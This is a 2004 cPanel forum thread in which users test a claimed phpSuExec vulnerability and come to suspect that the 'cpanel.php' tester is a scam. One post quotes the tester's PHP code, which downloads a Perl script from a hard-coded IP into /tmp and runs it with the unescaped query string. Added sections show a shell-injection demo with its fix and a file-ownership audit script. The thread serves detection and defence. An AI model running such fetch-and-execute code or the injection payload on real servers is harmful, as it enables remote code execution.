The Community Forums

Interact with an entire community of cPanel & WHM users!

phpsuexec vulnerability?

Discussion in 'General Discussion' started by LBJ, May 24, 2004.

  1. LBJ

    LBJ Well-Known Member

    Joined:
    Nov 1, 2003
    Messages:
    56
    Likes Received:
    0
    Trophy Points:
    6
    Has anyone seen any details regarding a vulnerability in phpSuExec on cpanel servers where Apache was compiled with PHPSuExec before April 15th, 2004?

    We received a brief email notification from a subscribed list about it but have been unable to dig up any corroboration.

    I ran a search on the forum but was unable to find any related info.

    Any pointers to some documentation would be most gratefully received.

    LBJ
     
  2. sparek-3

    sparek-3 Well-Known Member

    Joined:
    Aug 10, 2002
    Messages:
    1,384
    Likes Received:
    23
    Trophy Points:
    38
    cPanel Access Level:
    Root Administrator
  3. LBJ

    LBJ Well-Known Member

    Joined:
    Nov 1, 2003
    Messages:
    56
    Likes Received:
    0
    Trophy Points:
    6
    Thanks heaps for that.

    LBJ
     
  4. HD-Sam

    HD-Sam Active Member
    PartnerNOC

    Joined:
    Sep 23, 2003
    Messages:
    40
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Iowa City, Iowa
    I compiled Apache today with /scripts/easyapache, choosing option 5 on 9.20-s25.

    Vuln still exists.
     
  5. EDevil

    EDevil Member

    Joined:
    Feb 17, 2004
    Messages:
    21
    Likes Received:
    0
    Trophy Points:
    1
    Can anyone confirm that recompiling apache using easyapache still leaves us with a vulnerable system?
     
  6. Celta

    Celta Member

    Joined:
    Aug 30, 2003
    Messages:
    19
    Likes Received:
    0
    Trophy Points:
    1
    Has anyone successfully fixed this vulnerability? I have recompiled too, but the result is the same. I'm using Apache 1.3.31 / PHP 4.3.6 right now, but the tester PHP script shows I am still vulnerable :/

    I'd like to know what options you check in WHM when building Apache.

    Thanks in advance.
     
  7. SarcNBit

    SarcNBit Well-Known Member

    Joined:
    Oct 14, 2003
    Messages:
    1,010
    Likes Received:
    3
    Trophy Points:
    38
    From the linked article:
    Does anyone know the changelog entry or Bugtraq ID for this?

    I see that they are now saying that the security audit is 70% complete.
     
  8. GuiPos

    GuiPos Well-Known Member

    Joined:
    Jul 9, 2003
    Messages:
    59
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Indonesia / Germany
    From the WHM panel

    I rebuilt Apache to version apache (1.3.31 (Unix))
    and also updated PHP to 4.3.6 [suexec and phpSUexec].

    Ran the test again and it seems to work fine.

    celta

    By rebuilding Apache I enabled suexec and phpSUexec; I think this fixed the vulnerability.
     
  9. Celta

    Celta Member

    Joined:
    Aug 30, 2003
    Messages:
    19
    Likes Received:
    0
    Trophy Points:
    1
    Thank you very much... I'll give a try and let you know :)
     
  10. Celta

    Celta Member

    Joined:
    Aug 30, 2003
    Messages:
    19
    Likes Received:
    0
    Trophy Points:
    1
    It worked ! :)

    Note that when switching to phpsuexec, all customers must remove php_flag lines from .htaccess, and all .php files must be owned by their respective users.
    Changing that, I've corrected 99% of failures.

    Still to figure out why some scripts (e.g. Typo3) don't work :/ (maybe symlink issues in PHP files?)
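
The two breakages named in the post above (mod_php directives in .htaccess, and .php files not owned by the account) can be found before the switch rather than after. The script below is an added example, not cPanel's own tooling or anything from this thread; it assumes a POSIX find (the -user test) and takes the account's home directory and user name as arguments, which the caller supplies.

```shell
#!/bin/sh
# Added example, not cPanel's tooling: audit one account's home directory for
# the two things the post above says break after switching to phpSuExec.
#   1. php_flag / php_value lines in .htaccess. Under phpsuexec PHP runs as a
#      CGI, so Apache no longer knows these mod_php directives and answers 500;
#      the settings have to move to a php.ini the CGI reads instead.
#   2. .php files not owned by the account user. suexec refuses to execute a
#      target that is not owned by the user it switches to.
# Usage: audit_phpsuexec /home/ACCOUNT ACCOUNT
# Prints one line per finding; returns 0 when clean, 1 when anything was found.

audit_phpsuexec() {
    home=$1
    user=$2
    found=0

    # .htaccess files carrying mod_php directives (commented-out lines ignored)
    bad_htaccess=$(find "$home" -type f -name .htaccess \
        -exec grep -l -E '^[[:space:]]*php_(admin_)?(flag|value)[[:space:]]' {} + \
        2>/dev/null) || true

    # PHP scripts owned by anyone other than the account user
    bad_owner=$(find "$home" -type f -name '*.php' ! -user "$user" 2>/dev/null) || true

    # iterate one path per line so names containing spaces survive
    IFS='
'
    for f in $bad_htaccess; do
        echo "HTACCESS: $f has php_flag/php_value lines (move them to php.ini)"
        found=1
    done
    for f in $bad_owner; do
        echo "OWNER: $f is not owned by $user (chown $user '$f')"
        found=1
    done
    unset IFS
    return $found
}

# To audit every account on the box, assuming the account name is the home
# directory's basename (true for cPanel's /home/ACCOUNT layout):
#   for h in /home/*; do audit_phpsuexec "$h" "$(basename "$h")"; done
```

The grep pattern anchors on the directive keyword so a commented-out `# php_flag` line is not reported; the ownership test deliberately ignores group ownership, because suexec checks the owning UID only.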
     
  11. eazistore

    eazistore Well-Known Member

    Joined:
    Nov 7, 2003
    Messages:
    70
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Singapore
    vulnerability fix?

    We are running WHM 9.3.0 cPanel 9.3.0-C55
    Fedora - WHM X v3.1.0

    Apache Core :1.3.31
    PHP Suexec: 0.1b

    After doing the cpanel.php test, we get this result:
    http://www.eazistore.com/cpanel.php

    Performing white box security audit...
    PASSED: cPanel INSTALLED (9.3.0-CURRENT_55)
    PASSED: Privileged UID Vulnerability Check (32022)
    FAILED: Stealth Snoop Vulnerability [/home/eazistor] Explain
    PASSED: Simple $HOME Scanning [/home/eazistor]
    PASSED: Group $HOME Scanning [/home/eazistor]
    PASSED: Root /home scanning
    PASSED: Simple WEBROOT Protection
    PASSED: Real WEBROOT Protection
    PASSED: SUEXEC mod_phpsuexec Exploit Test
    FAILED: One or more insecure cPanel configurations were detected. Visit A-Squad.Com for details on where to find more secure cPanel hosting.


    Any suggestions on how to fix the FAILED status?

    Sincerely,
    Vincent
    http://www.eazistore.com/
     
  12. goodmove

    goodmove Well-Known Member

    Joined:
    May 12, 2003
    Messages:
    624
    Likes Received:
    0
    Trophy Points:
    16
    If you can execute the cpanel.php script, that means you are also vulnerable to allowing scripts to run from your /tmp directory.

    cpanel.php fetches a .pl file from an obscure IP address and runs it from the /tmp directory.
     
  13. tAzMaNiAc

    tAzMaNiAc Well-Known Member

    Joined:
    Feb 16, 2003
    Messages:
    559
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Sachse, TX
    A-Squad is using this as an advertisement for themselves as a hoster. :)

    That's a no-no.

    "If you host with A-Squad, you'll be safe."

    That already turned me off.
     
  14. rs-freddo

    rs-freddo Well-Known Member

    Joined:
    May 13, 2003
    Messages:
    832
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Australia
    cPanel Access Level:
    Root Administrator
    Looks like a scam to me.
     
  15. shann

    shann Well-Known Member

    Joined:
    Jul 5, 2002
    Messages:
    366
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Website Owner
    hi

    hi eazistore,

    I have the same status coming. Did you get it fixed? Please update.

    Thank You
    Shann
     
  16. eazistore

    eazistore Well-Known Member

    Joined:
    Nov 7, 2003
    Messages:
    70
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Singapore
    Re: hi

    Hello Shann,

    After reading a few posts above us here, I am starting to smell something fishy too. It looks like it's an advertisement to use their services: "Visit ??????.Com for details on where to find more secure cPanel hosting."

    I am not too sure if it's really an advertisement or just a scam to bring sales.

    What's your comment Shann?

    Rgds,
    Vincent
    http://www.eazistore.com
     
  17. shann

    shann Well-Known Member

    Joined:
    Jul 5, 2002
    Messages:
    366
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Website Owner
    hi

    Hi,

    I haven't looked deeply at the script. We should consult with others on this forum as well.

    I am not sure about this .pl script being run from /tmp; if it runs from there then we are in trouble.

    Let me do more investigation and post it here.

    shann
     
  18. eazistore

    eazistore Well-Known Member

    Joined:
    Nov 7, 2003
    Messages:
    70
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Singapore
    /tmp

    Hi Shann,

    From what I see inside the code:
    <?php
    // On first run, download tests.pl from a hard-coded IP into /tmp;
    // a file already present at that fixed path is used as-is.
    $tester = "/tmp/tests.pl";
    if (!file_exists($tester)) {
        $testw = fopen($tester, "w");
        ini_set('user_agent', __FILE__);           // reports this script's path as the User-Agent
        $testr = fopen("http://64.240.171.106/tests.pl", "r");
        while ($s = fread($testr, 1024)) { fwrite($testw, $s); }
        fclose($testw);
        fclose($testr);
    }
    // Run the downloaded script through the shell. $QUERY_STRING is the raw,
    // undecoded query string (available only with register_globals on) and is
    // spliced into the command without escaping.
    echo `perl $tester '$QUERY_STRING' 2>&1`;
    ?>


    I might not know much about PHP scripts, but this line looks suspicious: $tester = "/tmp/tests.pl";

    I have removed that cpanel.php file from my server so it cannot cause any harm to it.

    I hope some coder can explain if that script could cause any harm.

    Rgds,
    Vincent Kam
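
The last line of the script quoted above is worth a closer look than the /tmp path alone. PHP's backtick operator hands the whole string to /bin/sh -c, and the query string is spliced in between bare single quotes, so a client that sends a literal single quote (Apache passes QUERY_STRING through undecoded) closes the quoted argument and the rest of the query string is parsed as shell commands. The block below is an added example, not code from the thread or from A-Squad: it rebuilds that command string the same way, runs it the same way, and shows the repair that PHP's escapeshellarg() applies. It assumes a stand-in interpreter ("echo") in place of perl /tmp/tests.pl so it runs anywhere.

```shell
#!/bin/sh
# Added example, not code from the thread. The script posted above ends with
#     echo `perl $tester '$QUERY_STRING' 2>&1`;
# PHP's backtick operator passes that string to /bin/sh -c with the raw,
# undecoded query string spliced in. A single quote in the query string closes
# the quoted argument and whatever follows is parsed as shell. The functions
# below build the command string the same way, run it the same way, and show
# the fix: the rewrite escapeshellarg() performs (wrap in single quotes and
# turn each embedded ' into '\'').
# Assumption: "echo" stands in for "perl /tmp/tests.pl" so this runs anywhere.

PHP_INTERP=${PHP_INTERP:-echo}

# 1. What the posted script does: interpolate the value between bare quotes.
unsafe_cmd() {
    printf '%s' "$PHP_INTERP '$1' 2>&1"
}

# escapeshellarg() equivalent for sh:  abc -> 'abc',  a'b -> 'a'\''b'
shell_quote() {
    printf "'%s'" "$(printf '%s' "$1" | sed "s/'/'\\\\''/g")"
}

# 2. The same command with the argument properly quoted.
safe_cmd() {
    printf '%s' "$PHP_INTERP $(shell_quote "$1") 2>&1"
}

# Execute a command string the way PHP backticks do: hand it to sh -c.
run_like_backticks() {
    sh -c "$1"
}

# Demo: a query string that closes the quotes and runs an extra command.
# The unsafe form prints an INJECTED line of its own; the safe form only
# echoes the payload back as one argument.
demo() {
    payload="foo'; echo INJECTED; echo '"
    printf '%s\n' "--- unsafe: $(unsafe_cmd "$payload")"
    run_like_backticks "$(unsafe_cmd "$payload")"
    printf '%s\n' "--- safe:   $(safe_cmd "$payload")"
    run_like_backticks "$(safe_cmd "$payload")"
}

demo
```

Quoting the argument fixes only the injection. The fixed /tmp/tests.pl path guarded by file_exists() is a separate problem visible in the same code: /tmp is writable by every local user, so whoever plants a file there first has their code run by the next visitor to cpanel.php, under whatever user PHP executes as.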
     
  19. eazistore

    eazistore Well-Known Member

    Joined:
    Nov 7, 2003
    Messages:
    70
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Singapore
    tests.pl code

    Hi,

    I have looked into my /tmp and indeed there is a tests.pl in it!
    I deleted it immediately to avoid trouble, of course.

    Here's the tests.pl contents if anybody would like to inspect it.
     
  20. goodmove

    goodmove Well-Known Member

    Joined:
    May 12, 2003
    Messages:
    624
    Likes Received:
    0
    Trophy Points:
    16
    Allowing scripts to run from /tmp under a user's name is the main issue.
     
